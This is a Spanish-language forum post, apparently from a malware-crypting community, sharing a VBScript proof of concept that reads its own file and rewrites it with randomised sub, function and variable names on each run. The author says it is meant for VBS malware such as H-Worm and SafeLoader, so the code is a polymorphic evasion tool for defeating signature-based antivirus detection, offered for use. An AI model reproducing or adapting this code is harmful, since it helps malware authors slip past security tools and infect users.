he hecho una función para (poli)metamorfizar (no sé cual es el término correcto) un script en VBS en runtime. Es una prueba de concepto, lo he probado con el propio script y funciona pero no lo he testeado con scripts más largos (H-Worm) o complejos (SafeLoader).
Call ItsMorphinTime
'####################################'
'=> By Blau (2016) - Indetectables.NET
'=> Function: ItsMorphinTime
'=> Description: Randomize declarations (variables, subs and functions) at runtime
Sub ItsMorphinTime()
Dim objMatches
Dim objFSO: Set objFSO = CreateObject("Scripting.FileSystemObject")
Dim objME: Set objMe = objFSO.OpenTextfile(WScript.ScriptFullName, 1)
Dim sScript: sScript = objMe.ReadAll
Dim objRegExp: Set objRegExp = New RegExp: objRegExp.IgnoreCase = True: objRegExp.Global = True
'=> Replace all subs & functions
objRegExp.Pattern = "(\bSub|\bFunction)\s(.+?)\("
If objRegExp.Test(sScript) Then
Set objMatches = objRegExp.Execute(sScript)
For i = 0 To (objMatches.Count - 1): sScript = Replace(sScript, objMatches.Item(i).SubMatches(1), RandomString()): Next
End If
'=> Replace variables (starting with Dim)
objRegExp.Pattern = "\bdim\s([a-zA-Z0-9, ]+)"
If objRegExp.Test(sScript) Then
Set objMatches = objRegExp.Execute(sScript)
Dim sVarSplit
For i = 0 To (objMatches.Count - 1)
sVarSplit = Split(objMatches.Item(i).SubMatches(0), ",")
If (UBound(sVarSplit) > 0) Then
For j = 1 To UBound(sVarSplit): sScript = Replace(sScript, sVarSplit(j), RandomString()): Next
Else: sScript = Replace(sScript, objMatches.Item(i).SubMatches(0), RandomString())
End If
Next
End If
'=> Rewrite
Set objMe = objFSO.OpenTextfile(WScript.ScriptFullName, 2): objMe.Write sScript
End Sub
Function RandomString(): Randomize: For i = 1 To (Int(Rnd*25)+15): RandomString = RandomString & Chr(Int(26*Rnd+97)): Next: End Function
'####################################'